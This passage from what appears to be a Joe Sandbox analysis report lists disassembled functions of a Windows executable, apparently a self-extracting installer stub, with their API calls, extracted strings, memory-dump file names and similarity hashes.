??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000), ref: 00403F66
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?), ref: 00403F6E

Strings

%%T/, xrefs: 00403F20
%%T\, xrefs: 00403EE2

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@
String ID: %%T/$%%T\
API String ID: 613200358-2679640699
Opcode ID: 2d470cc8d94283252956d989b6689dc2ebbd5fd7352af1e53a5b04c2beeae0dc
Instruction ID: 8200ff4dc01eb7e5f3d0cd3b0db6b275db18d134b8f46633e684875e90eeb5b2
Opcode Fuzzy Hash: 2d470cc8d94283252956d989b6689dc2ebbd5fd7352af1e53a5b04c2beeae0dc
Instruction Fuzzy Hash: 7D11C935D00109FADF05FFA1D897CEDBB79AF10308F50812AB915721E1DB7856899B98

Function 00403F77 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403FBD
??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?), ref: 00403FFB
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000), ref: 00404021
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?), ref: 00404029

Strings

%%S\, xrefs: 00403F9D
%%S/, xrefs: 00403FDB

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@
String ID: %%S/$%%S\
API String ID: 613200358-358529586
Opcode ID: 7b4ece7d9f6b764ff1fa2c68a3db059a5987571cf6115451b9ca4ed44b585732
Instruction ID: ba471a5e309da56b19bd8a7b5a96c0f25c3cff1cb933eb2d3e2d1b68bec26358
Opcode Fuzzy Hash: 7b4ece7d9f6b764ff1fa2c68a3db059a5987571cf6115451b9ca4ed44b585732
Instruction Fuzzy Hash: 1811F935C00109FADF05FFA1D993CEE7B38AF10308F50812AB915721E1DB7856899B88

Function 0040D79C Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 42COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(00416CB4,00417010), ref: 0040D834

Strings

xmA, xrefs: 0040D7B8
plA, xrefs: 0040D7F5
XkA, xrefs: 0040D7B1
XkA, xrefs: 0040D7A3
`lA, xrefs: 0040D7FC
xmA, xrefs: 0040D7AA

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ExceptionThrow
String ID: XkA$XkA$`lA$plA$xmA$xmA
API String ID: 432778473-1797977924
Opcode ID: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
Instruction ID: 93ec62a24b9d8e66450440f0cc9ce576a4bb083ddd4f3a3c79e319c7eabf7869
Opcode Fuzzy Hash: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
Instruction Fuzzy Hash: AB11D3B0601B008AC3308F169549587FBF8EF51758712CA1FD09A97A10D3F8E1888B99

Function 004054C1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00419858,00000001,00419858,00419858,00000001,?,00000000), ref: 00405543
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055A5
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055BD

Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A

Strings

;!@Install@!UTF-8!, xrefs: 0040555E
;!@InstallEnd@!, xrefs: 00405578

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@$FileTime$AttributesSystemlstrlen
String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 4038993085-372238525
Opcode ID: d3e9f328c178d1c37d8d2be3e420e2ffe5dfcc72685fcec157493962aa3a5304
Instruction ID: 9c73dee187ac7940ac785f0cdfe29d60513ad58ba118a45472d9fba9eb214e5e
Opcode Fuzzy Hash: d3e9f328c178d1c37d8d2be3e420e2ffe5dfcc72685fcec157493962aa3a5304
Instruction Fuzzy Hash: EA314871D0021AEACF01EF92CC569EEBB75FF58318F10402BE415722D1DB785645DB98

Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00401053
wsprintfW.USER32 ref: 00401071
lstrcatW.KERNEL32(?,?), ref: 00401084
ExitProcess.KERNEL32 ref: 004010AC

Strings

0x%p, xrefs: 0040106B

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: wsprintf$ExitProcesslstrcat
String ID: 0x%p
API String ID: 2530384128-1745605757
Opcode ID: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
Instruction ID: 82a0a4c7c3cac984b025113f951df6a1ad0c5e072908762b67de37e2b53db34b
Opcode Fuzzy Hash: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
Instruction Fuzzy Hash: A4114FB5800308EFDB20EFA4DD85ADBB3BCAF44304F54447BE645A3591D678AA84CF69

Function 00407DA1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407DB6
SHBrowseForFolderW.SHELL32(?), ref: 00407DCF
SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 00407DEB
SHGetMalloc.SHELL32(00000000), ref: 00407E15

Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4

Strings

A, xrefs: 00407DC8

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: BrowseFocusFolderFromItemListMallocPathmemset
String ID: A
API String ID: 1557639607-3554254475
Opcode ID: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
Instruction ID: c991f1184b04d71a34ab75a046ed33f3991a90ed18c7befb8679fee52583d13b
Opcode Fuzzy Hash: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
Instruction Fuzzy Hash: C3111F71A04208EBDB20DBA5C958BDE77BCAB84705F1400B9E905E7281DB78EE45CBB5

Function 00402B71 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402BA2
??3@YAXPAX@Z.MSVCRT(?), ref: 00402BAB

Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8

ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402BC3
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402BE3

Strings

SetEnvironment, xrefs: 00402BB3, 00402BC2

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@$EnvironmentExpandStrings$??2@
String ID: SetEnvironment
API String ID: 612612615-360490078
Opcode ID: 6fd92685c7c07524cb69523a0b3f88b0f5b66f8a7d46db0576145f2387c58a16
Instruction ID: 872148d7285510cba3beb976fe90dd67b0f7b9c7622c942f2c5d0e041fd95c9f
Opcode Fuzzy Hash: 6fd92685c7c07524cb69523a0b3f88b0f5b66f8a7d46db0576145f2387c58a16
Instruction Fuzzy Hash: 93015E72D00104BADB15ABA5ED81DEEB3BCAF44314B10416BF902B71D1DBB96A418AA8

Function 0040464B Relevance: 7.6, APIs: 5, Instructions: 96stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004193C0,00000020,-00000002,-00000004,00405FF0,-00000002,?,?,00000000,0000000A), ref: 00404664
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404716
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040471E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040472D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404735

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@$lstrlen
String ID:
API String ID: 2031685711-0
Opcode ID: 6bb2115abc2b7983059f506be08371e38299eabc65903dd6bc67c7965611ea45
Instruction ID: aeb94b40578403fee1b74b38ef18ad41e7f72b790eaa200ba48685626c4261d0
Opcode Fuzzy Hash: 6bb2115abc2b7983059f506be08371e38299eabc65903dd6bc67c7965611ea45
Instruction Fuzzy Hash: 6B214972D00104ABCF216FA0CC019EE77A8EF96355F10443BEA41B72E1F77E4D818648

Function 0040809D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000B), ref: 00407A93
Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000C), ref: 00407A9C

GetSystemMetrics.USER32(00000007), ref: 004080B4
GetSystemMetrics.USER32(00000007), ref: 004080C5
??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 0040818C

Strings

100%% , xrefs: 004080E4, 004080EB, 00408144

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: MetricsSystem$??3@
String ID: 100%%
API String ID: 2562992111-568723177
Opcode ID: c443a307be741d7f7ead550379958d9eb8597f0a20c174b700036d4b2d32541d
Instruction ID: 0c509f118c308a7c78e08742548c734dda8a0b47b1f593a1d30cecdc3777ed32
Opcode Fuzzy Hash: c443a307be741d7f7ead550379958d9eb8597f0a20c174b700036d4b2d32541d
Instruction Fuzzy Hash: CE31D471A007059FCB24DF65C9459AEB7F4EF40704B00052ED542A72D1DB74FD45CBA9

Function 00404E99 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 00407C87: GetSystemMetrics.USER32(00000010), ref: 00407CC9
Part of subcall function 00407C87: GetSystemMetrics.USER32(00000011), ref: 00407CD7

wsprintfW.USER32 ref: 00404F19
??3@YAXPAX@Z.MSVCRT(00405872,00000011,00405872,00000000,004166D0,?), ref: 00404F56

Strings

%X - %03X - %03X - %03X - %03X, xrefs: 00404F13
xcA, xrefs: 00404EB7

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: MetricsSystem$??3@wsprintf
String ID: %X - %03X - %03X - %03X - %03X$xcA
API String ID: 1174869416-1550840741
Opcode ID: 28233daca7dc8c0aaef89f8cc8e472a8a905b5bdfe7962c42f7df5a404a7e39a
Instruction ID: 41466d8614d0a23c37c50aec3ef54a83e840c1df2718244856808616b3002f3b
Opcode Fuzzy Hash: 28233daca7dc8c0aaef89f8cc8e472a8a905b5bdfe7962c42f7df5a404a7e39a
Instruction Fuzzy Hash: F9117F71D44218ABDB15EB90DC56FEDB334BB10B08F10417EEA55361D2DBB86A44CB9C

Function 0040421B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
_wcsnicmp.MSVCRT ref: 0040423D

Strings

Mg@, xrefs: 00404224

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: lstrlen$_wcsnicmp
String ID: Mg@
API String ID: 2823567412-3680729969
Opcode ID: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
Instruction ID: 9e1626592046255a92b3b8c2eb79444d9ed7104295bc7c238f4b93e2fb8c8d27
Opcode Fuzzy Hash: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
Instruction Fuzzy Hash: 09E026726042019BC700CBA5ED84C8B7BECEAC8790B00087BF700E3011E334D8148BB5

Function 004023B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
GetProcAddress.KERNEL32(00000000), ref: 004023CF

Strings

Wow64RevertWow64FsRedirection, xrefs: 004023BE
kernel32, xrefs: 004023C3

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32
API String ID: 2574300362-3900151262
Opcode ID: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
Instruction ID: 50d9489a907287b4f58dec005f8c8a71b0fe89906bae8f062ddf8536b40cf8c2
Opcode Fuzzy Hash: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
Instruction Fuzzy Hash: C3D0C970A91700FBDB511FA0EE2DBD636A6EB80B0BF448436E812A00F0C7FC4884CA1C

Function 004023E9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040243F,?,004069D7,?,00000000,?,?), ref: 004023FA
GetProcAddress.KERNEL32(00000000), ref: 00402401

Strings

Wow64DisableWow64FsRedirection, xrefs: 004023F0
kernel32, xrefs: 004023F5

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32
API String ID: 2574300362-736604160
Opcode ID: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
Instruction ID: 88d9777829bf04cc8710f0dfabc1d7fbda4bae52ffa2c7d5b88ac942ae81d74a
Opcode Fuzzy Hash: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
Instruction Fuzzy Hash: FFD0C970691600FAD7105FA4DD2DBC639A6AFC0B06F548026A016E00D4C7FC4880861D

Function 00402DD6 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC

Part of subcall function 00402AD8: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402E3A,?,?,00000000,00000000,00000000), ref: 00402B0A

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@$ByteCharMultiWide
String ID:
API String ID: 1731127917-0
Opcode ID: 1e3fad64e38c237be7588ae4e08319b35da6193c363803fec32d6cfd5e7375db
Instruction ID: e682ebc0571d90e9fd1001dd074fc16d37aecbe567f5019eda1f00a411694e7c
Opcode Fuzzy Hash: 1e3fad64e38c237be7588ae4e08319b35da6193c363803fec32d6cfd5e7375db
Instruction Fuzzy Hash: BE31F672C44114AADB14FBA2DD429EF73BDEF10318B50443FF856B21E1EE3C9A4586A8

Function 00408A1C Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9

Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408A64
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408A84
GetDlgItem.USER32(?,000004B7), ref: 00408A97
SetWindowLongW.USER32(00000000,000000FC,Function_00007823), ref: 00408AA5

Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD

Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
String ID:
API String ID: 3043669009-0
Opcode ID: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
Instruction ID: 5c7c764d92766e680c666047e1d2b266a9282aef260ce17b2660fed0a98cdec4
Opcode Fuzzy Hash: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
Instruction Fuzzy Hash: 62118672E40314ABCB10EBA9DC09FDE77BCEB84714F10446BB652E72D0DAB8A9018B54

Function 0040709B Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 004070C2
GetSystemMetrics.USER32(00000031), ref: 004070E8
CreateFontIndirectW.GDI32(?), ref: 004070F7
DeleteObject.GDI32(00000000), ref: 00407126

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
String ID:
API String ID: 1900162674-0
Opcode ID: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
Instruction ID: 550de309380991ebf2cc5542bfcce979d3dc35c4f0fc859f263023f0ef030489
Opcode Fuzzy Hash: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
